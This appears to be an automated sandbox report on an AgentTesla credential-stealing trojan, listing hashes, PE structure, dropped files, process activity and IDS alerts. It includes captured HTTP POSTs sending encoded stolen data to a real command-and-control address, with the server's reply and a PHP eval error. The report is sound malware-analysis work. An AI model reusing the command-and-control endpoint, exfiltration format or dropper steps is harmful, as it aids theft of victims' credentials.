                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):521216
                                                            Entropy (8bit):6.68537661395277
                                                            Encrypted:false
                                                            SSDEEP:12288:hBuapACH7mAxDuS7yYjcQtjHwCq+qS5TiJ4gnAGZyOwG:1XmYjcQtjHwCq+qS5TiJ4gnAKyOwG
                                                            MD5:18E913EC810A1131C23D6FEA7526C4F8
                                                            SHA1:96C426169C87505E950898AD38913CC726BF198D
                                                            SHA-256:548A9D790D8D54BAF1FAF9C67133398A96FAD5ADD7DAA35E89AAD9D777BD103D
                                                            SHA-512:F7DB06C94A8F5D052D66F1297DF5F1A60892F15A8E4AB9069F6654DD8119738E62FC1779D220B49710D8DA067CC2A437909BEDC75C86B248B196A86F31224F0A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 51%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c................."..........^A... ...`....@.. .......................`.......Y....@..................................A..O....`.......................@....................................................... ............... ..H............text...d!... ...".................. ..`.rsrc........`.......$..............@..@.reloc.......@......................@..B................@A......H.......P...........3...d=...F..........................................IvMeedev..(....*..-.*(....&*2~{....(....*..(....*.*..{....*..{....*:~.......(....*..{....*..{....*:~.......(....*..{....*6~......(....*..{....*..{....*..{....*..{....*..{....*..{....*..{....*.~....(....*.~Q...(....*.~....(....*..{....*.~6...(....*..{....*..{....*..{....*6~F.....(....*6~G.....(....*..0...........{....#..^nY7^@#.....@O@(i...X(j...(.....z....#......M@#.....@M@(k...X(j...("....y....#....]h@#

                                                            C:\Users\user\AppData\Roaming\fghn\fghn.exe:Zone.Identifier

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                            \Device\ConDrv

                                                            Download File
                                                            Process:C:\Users\user\AppData\Roaming\excel\excel.exe
                                                            File Type:ASCII text, with very long lines
                                                            Category:dropped
                                                            Size (bytes):6809
                                                            Entropy (8bit):4.315685828355093
                                                            Encrypted:false
                                                            SSDEEP:96:zKHDGKD7zrrRYZZ/HPw4//HP/HH6K1jqQiGyGTFchzCKtihKCsO2b0N/+7vKAKPO:YrRYZXCKgQifr8sC/635P
                                                            MD5:DA37CE62FC9ABAB3226A1797FF449487
                                                            SHA1:18F29B4F3B1D12BA18DF2EF8964DA20107EEFFC9
                                                            SHA-256:80EAB2A83F12150619544DBFFDD130D60B6869EE742F9000F8E3109F406FAD6E
                                                            SHA-512:5A8BF4140440BCB218CFE90A3371AE761212BC4364DC7E7C055980D3FAB4C4E4499B1CADB13666D4D5F03B6AE835AEE4B44F78D4B2A4AA4ABDF20D8161B12F66
                                                            Malicious:false
                                                            Preview:Microsoft (R) Visual Basic Compiler version 14.7.3056.for Visual Basic 2012.Copyright (c) Microsoft Corporation. All rights reserved...This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to Visual Basic 2012, which is no longer the latest version. For compilers that support newer versions of the Visual Basic programming language, see http://go.microsoft.com/fwlink/?LinkID=533241.. Visual Basic Compiler Options.. - OUTPUT FILE -./out:<file> Specifies the output file name../target:exe Create a console application (default). (Short form: /t)./target:winexe Create a Windows application../target:library Create a library assembly../target:module Create a module that can be added to an assembly../target:appcontainerexe Create a Windows application that runs in AppContainer../ta

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):6.68537661395277
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:pdP5Rv9pPW.exe
                                                            File size:521216
                                                            MD5:18e913ec810a1131c23d6fea7526c4f8
                                                            SHA1:96c426169c87505e950898ad38913cc726bf198d
                                                            SHA256:548a9d790d8d54baf1faf9c67133398a96fad5add7daa35e89aad9d777bd103d
                                                            SHA512:f7db06c94a8f5d052d66f1297df5f1a60892f15a8e4ab9069f6654dd8119738e62fc1779d220b49710d8da067cc2a437909bedc75c86b248b196a86f31224f0a
                                                            SSDEEP:12288:hBuapACH7mAxDuS7yYjcQtjHwCq+qS5TiJ4gnAGZyOwG:1XmYjcQtjHwCq+qS5TiJ4gnAKyOwG
                                                            TLSH:B6B41E1C3E011A66FD0F9130CC092A857BA60FA33341A99757BF3FCAAB6F0566F45985
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c................."..........^A... ...`....@.. .......................`.......Y....@................................

                                                            File Icon

                                                            Icon Hash:f0b2f26dd88ec6e8

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x47415e
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x63041C8C [Tue Aug 23 00:17:16 2022 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x7410c0x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x760000xcdba.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x840000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000x721640x72200False0.6246641395125958data6.786232224405754IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0x760000xcdba0xce00False0.3315951152912621data4.354166179939291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x840000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountry
                                                            RT_ICON0x762c40xea8dataEnglishUnited States
                                                            RT_ICON0x7716c0x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                            RT_ICON0x77a140x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                            RT_ICON0x77f7c0x1cecPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                            RT_ICON0x79c680x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 64767, next used block 4282318848EnglishUnited States
                                                            RT_ICON0x7de900x25a8dataEnglishUnited States
                                                            RT_ICON0x804380x10a8dataEnglishUnited States
                                                            RT_ICON0x814e00x988dataEnglishUnited States
                                                            RT_ICON0x81e680x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                            RT_GROUP_ICON0x822d00x84dataEnglishUnited States
                                                            RT_VERSION0x823540x340dataEnglishUnited States
                                                            RT_MANIFEST0x826940x726XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

                                                            Imports

                                                            DLLImport
                                                            mscoree.dll_CorExeMain

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishUnited States

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            192.168.2.4141.98.6.7549717802034579 08/28/22-17:19:41.645966TCP2034579ET TROJAN AgentTesla Communicating with CnC Server4971780192.168.2.4141.98.6.75
                                                            192.168.2.4141.98.6.7549753802034579 08/28/22-17:21:11.426704TCP2034579ET TROJAN AgentTesla Communicating with CnC Server4975380192.168.2.4141.98.6.75

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Aug 28, 2022 17:19:41.617660046 CEST4971780192.168.2.4141.98.6.75
                                                            Aug 28, 2022 17:19:41.645329952 CEST8049717141.98.6.75192.168.2.4
                                                            Aug 28, 2022 17:19:41.645463943 CEST4971780192.168.2.4141.98.6.75
                                                            Aug 28, 2022 17:19:41.645966053 CEST4971780192.168.2.4141.98.6.75
                                                            Aug 28, 2022 17:19:41.676053047 CEST8049717141.98.6.75192.168.2.4
                                                            Aug 28, 2022 17:19:41.676698923 CEST4971780192.168.2.4141.98.6.75
                                                            Aug 28, 2022 17:19:41.717947960 CEST8049717141.98.6.75192.168.2.4
                                                            Aug 28, 2022 17:19:41.870405912 CEST4971780192.168.2.4141.98.6.75
                                                            Aug 28, 2022 17:19:46.736474991 CEST8049717141.98.6.75192.168.2.4
                                                            Aug 28, 2022 17:19:46.737335920 CEST4971780192.168.2.4141.98.6.75
                                                            Aug 28, 2022 17:20:56.445935011 CEST4971780192.168.2.4141.98.6.75
                                                            Aug 28, 2022 17:21:11.399175882 CEST4975380192.168.2.4141.98.6.75
                                                            Aug 28, 2022 17:21:11.426378965 CEST8049753141.98.6.75192.168.2.4
                                                            Aug 28, 2022 17:21:11.426496029 CEST4975380192.168.2.4141.98.6.75
                                                            Aug 28, 2022 17:21:11.426703930 CEST4975380192.168.2.4141.98.6.75
                                                            Aug 28, 2022 17:21:11.457539082 CEST8049753141.98.6.75192.168.2.4
                                                            Aug 28, 2022 17:21:11.458311081 CEST4975380192.168.2.4141.98.6.75
                                                            Aug 28, 2022 17:21:11.502499104 CEST8049753141.98.6.75192.168.2.4
                                                            Aug 28, 2022 17:21:11.652420044 CEST4975380192.168.2.4141.98.6.75
                                                            Aug 28, 2022 17:21:16.503520966 CEST8049753141.98.6.75192.168.2.4
                                                            Aug 28, 2022 17:21:16.503599882 CEST4975380192.168.2.4141.98.6.75

                                                            HTTP Request Dependency Graph

                                                            • 141.98.6.75

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.2.449717141.98.6.7580C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Aug 28, 2022 17:19:41.645966053 CEST10767OUTPOST /weption/inc/0986372054b5f8.php HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 141.98.6.75
                                                            Content-Length: 580
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Aug 28, 2022 17:19:41.676053047 CEST10767INHTTP/1.1 100 Continue
                                                            Aug 28, 2022 17:19:41.676698923 CEST10768OUTData Raw: 70 3d 41 67 50 4b 49 45 4d 73 4d 35 77 6c 41 30 37 56 52 6e 48 2f 4b 44 6e 50 4b 54 30 48 51 38 4f 45 77 35 78 33 51 45 36 45 57 75 58 46 7a 4f 50 33 76 6c 4f 32 54 75 53 53 45 4f 31 76 4a 50 4e 39 32 71 32 61 33 67 61 30 66 47 50 61 69 67 72 63
                                                            Data Ascii: p=AgPKIEMsM5wlA07VRnH/KDnPKT0HQ8OEw5x3QE6EWuXFzOP3vlO2TuSSEO1vJPN92q2a3ga0fGPaigrck7DC5Z49tJDT%2BXo73d3fvcYnbGR0KYqQKmtPL7vmLI768cdQrxvcTMDusgY7hIOdgUi3bTdcEThCyfZo3X%2BFrsd1mLn4emqzdOxy3m8gkTAnZRr3ms4QI8KY1H/zM79/CZNKp4RMttYjpPF9PY/%2Bhv4UPHA
                                                            Aug 28, 2022 17:19:41.717947960 CEST10769INHTTP/1.1 200 OK
                                                            Date: Sun, 28 Aug 2022 15:19:41 GMT
                                                            Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
                                                            X-Powered-By: PHP/8.1.6
                                                            Content-Length: 552
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 5b 5b 22 49 6e 74 65 72 6e 65 74 20 44 6f 77 6e 6c 6f 61 64 20 4d 61 6e 61 67 65 72 22 2c 22 68 74 74 70 3a 2f 2f 58 37 72 7a 64 79 38 78 33 49 72 4a 50 2e 6e 65 74 22 2c 22 43 66 54 4d 37 4c 58 47 69 61 52 30 22 2c 22 6e 55 31 46 44 59 34 31 77 52 4d 4f 22 5d 2c 5b 22 4a 44 6f 77 6e 6c 6f 61 64 65 72 22 2c 22 0a 6d 4b 79 56 74 63 55 6a 4e 49 6f 2e 22 2c 22 25 30 41 70 62 65 64 52 42 50 6d 6e 75 6c 6c 22 2c 22 25 30 41 36 46 34 59 33 4f 47 44 48 33 4f 52 34 4a 45 22 5d 5d 3c 62 72 20 2f 3e 0a 3c 62 3e 46 61 74 61 6c 20 65 72 72 6f 72 3c 2f 62 3e 3a 20 20 55 6e 63 61 75 67 68 74 20 54 79 70 65 45 72 72 6f 72 3a 20 73 69 7a 65 6f 66 28 29 3a 20 41 72 67 75 6d 65 6e 74 20 23 31 20 28 24 76 61 6c 75 65 29 20 6d 75 73 74 20 62 65 20 6f 66 20 74 79 70 65 20 43 6f 75 6e 74 61 62 6c 65 7c 61 72 72 61 79 2c 20 6e 75 6c 6c 20 67 69 76 65 6e 20 69 6e 20 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 77 65 70 74 69 6f 6e 5c 69 6e 63 5c 30 39 38 36 33 37 32 30 35 34 62 35 66 38 2e 70 68 70 28 31 32 29 20 3a 20 65 76 61 6c 28 29 27 64 20 63 6f 64 65 3a 31 32 37 0a 53 74 61 63 6b 20 74 72 61 63 65 3a 0a 23 30 20 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 77 65 70 74 69 6f 6e 5c 69 6e 63 5c 30 39 38 36 33 37 32 30 35 34 62 35 66 38 2e 70 68 70 28 31 32 29 3a 20 65 76 61 6c 28 29 0a 23 31 20 7b 6d 61 69 6e 7d 0a 20 20 74 68 72 6f 77 6e 20 69 6e 20 3c 62 3e 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 77 65 70 74 69 6f 6e 5c 69 6e 63 5c 30 39 38 36 33 37 32 30 35 34 62 35 66 38 2e 70 68 70 28 31 32 29 20 3a 20 65 76 61 6c 28 29 27 64 20 63 6f 64 65 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 31 32 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a
                                                            Data Ascii: [["Internet Download Manager","http://X7rzdy8x3IrJP.net","CfTM7LXGiaR0","nU1FDY41wRMO"],["JDownloader","mKyVtcUjNIo.","%0ApbedRBPmnull","%0A6F4Y3OGDH3OR4JE"]]<br /><b>Fatal error</b>: Uncaught TypeError: sizeof(): Argument #1 ($value) must be of type Countable|array, null given in C:\xampp\htdocs\weption\inc\0986372054b5f8.php(12) : eval()'d code:127Stack trace:#0 C:\xampp\htdocs\weption\inc\0986372054b5f8.php(12): eval()#1 {main} thrown in <b>C:\xampp\htdocs\weption\inc\0986372054b5f8.php(12) : eval()'d code</b> on line <b>127</b><br />


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1192.168.2.449753141.98.6.7580C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Aug 28, 2022 17:21:11.426703930 CEST11407OUTPOST /weption/inc/0986372054b5f8.php HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 141.98.6.75
                                                            Content-Length: 580
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Aug 28, 2022 17:21:11.457539082 CEST11407INHTTP/1.1 100 Continue
                                                            Aug 28, 2022 17:21:11.458311081 CEST11408OUTData Raw: 70 3d 41 67 50 4b 49 45 4d 73 4d 35 77 6c 41 30 37 56 52 6e 48 2f 4b 44 6e 50 4b 54 30 48 51 38 4f 45 77 35 78 33 51 45 36 45 57 75 58 46 7a 4f 50 33 76 6c 4f 32 54 75 53 53 45 4f 31 76 4a 50 4e 39 32 71 32 61 33 67 61 30 66 47 50 61 69 67 72 63
                                                            Data Ascii: p=AgPKIEMsM5wlA07VRnH/KDnPKT0HQ8OEw5x3QE6EWuXFzOP3vlO2TuSSEO1vJPN92q2a3ga0fGPaigrck7DC5Z49tJDT%2BXo73d3fvcYnbGR0KYqQKmtPL7vmLI768cdQrxvcTMDusgY7hIOdgUi3bTdcEThCyfZo3X%2BFrsd1mLn4emqzdOxy3m8gkTAnZRr3/apzkYkqCL4A0bee2KrvL4RMttYjpPF9PY/%2Bhv4UPHA
                                                            Aug 28, 2022 17:21:11.502499104 CEST11409INHTTP/1.1 200 OK
                                                            Date: Sun, 28 Aug 2022 15:21:11 GMT
                                                            Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
                                                            X-Powered-By: PHP/8.1.6
                                                            Content-Length: 552
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 5b 5b 22 49 6e 74 65 72 6e 65 74 20 44 6f 77 6e 6c 6f 61 64 20 4d 61 6e 61 67 65 72 22 2c 22 68 74 74 70 3a 2f 2f 58 37 72 7a 64 79 38 78 33 49 72 4a 50 2e 6e 65 74 22 2c 22 43 66 54 4d 37 4c 58 47 69 61 52 30 22 2c 22 6e 55 31 46 44 59 34 31 77 52 4d 4f 22 5d 2c 5b 22 4a 44 6f 77 6e 6c 6f 61 64 65 72 22 2c 22 0a 6d 4b 79 56 74 63 55 6a 4e 49 6f 2e 22 2c 22 25 30 41 70 62 65 64 52 42 50 6d 6e 75 6c 6c 22 2c 22 25 30 41 36 46 34 59 33 4f 47 44 48 33 4f 52 34 4a 45 22 5d 5d 3c 62 72 20 2f 3e 0a 3c 62 3e 46 61 74 61 6c 20 65 72 72 6f 72 3c 2f 62 3e 3a 20 20 55 6e 63 61 75 67 68 74 20 54 79 70 65 45 72 72 6f 72 3a 20 73 69 7a 65 6f 66 28 29 3a 20 41 72 67 75 6d 65 6e 74 20 23 31 20 28 24 76 61 6c 75 65 29 20 6d 75 73 74 20 62 65 20 6f 66 20 74 79 70 65 20 43 6f 75 6e 74 61 62 6c 65 7c 61 72 72 61 79 2c 20 6e 75 6c 6c 20 67 69 76 65 6e 20 69 6e 20 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 77 65 70 74 69 6f 6e 5c 69 6e 63 5c 30 39 38 36 33 37 32 30 35 34 62 35 66 38 2e 70 68 70 28 31 32 29 20 3a 20 65 76 61 6c 28 29 27 64 20 63 6f 64 65 3a 31 32 37 0a 53 74 61 63 6b 20 74 72 61 63 65 3a 0a 23 30 20 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 77 65 70 74 69 6f 6e 5c 69 6e 63 5c 30 39 38 36 33 37 32 30 35 34 62 35 66 38 2e 70 68 70 28 31 32 29 3a 20 65 76 61 6c 28 29 0a 23 31 20 7b 6d 61 69 6e 7d 0a 20 20 74 68 72 6f 77 6e 20 69 6e 20 3c 62 3e 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 77 65 70 74 69 6f 6e 5c 69 6e 63 5c 30 39 38 36 33 37 32 30 35 34 62 35 66 38 2e 70 68 70 28 31 32 29 20 3a 20 65 76 61 6c 28 29 27 64 20 63 6f 64 65 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 31 32 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a
                                                            Data Ascii: [["Internet Download Manager","http://X7rzdy8x3IrJP.net","CfTM7LXGiaR0","nU1FDY41wRMO"],["JDownloader","mKyVtcUjNIo.","%0ApbedRBPmnull","%0A6F4Y3OGDH3OR4JE"]]<br /><b>Fatal error</b>: Uncaught TypeError: sizeof(): Argument #1 ($value) must be of type Countable|array, null given in C:\xampp\htdocs\weption\inc\0986372054b5f8.php(12) : eval()'d code:127Stack trace:#0 C:\xampp\htdocs\weption\inc\0986372054b5f8.php(12): eval()#1 {main} thrown in <b>C:\xampp\htdocs\weption\inc\0986372054b5f8.php(12) : eval()'d code</b> on line <b>127</b><br />


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:17:18:58
                                                            Start date:28/08/2022
                                                            Path:C:\Users\user\Desktop\pdP5Rv9pPW.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\pdP5Rv9pPW.exe"
                                                            Imagebase:0x190000
                                                            File size:521216 bytes
                                                            MD5 hash:18E913EC810A1131C23D6FEA7526C4F8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low

                                                            General

                                                            Target ID:2
                                                            Start time:17:19:26
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                            Imagebase:0xc40000
                                                            File size:2688096 bytes
                                                            MD5 hash:B3A917344F5610BEEC562556F11300FA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate

                                                            General

                                                            Target ID:4
                                                            Start time:17:19:28
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghn
                                                            Imagebase:0xd90000
                                                            File size:232960 bytes
                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Target ID:5
                                                            Start time:17:19:29
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7c72c0000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Target ID:6
                                                            Start time:17:19:29
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
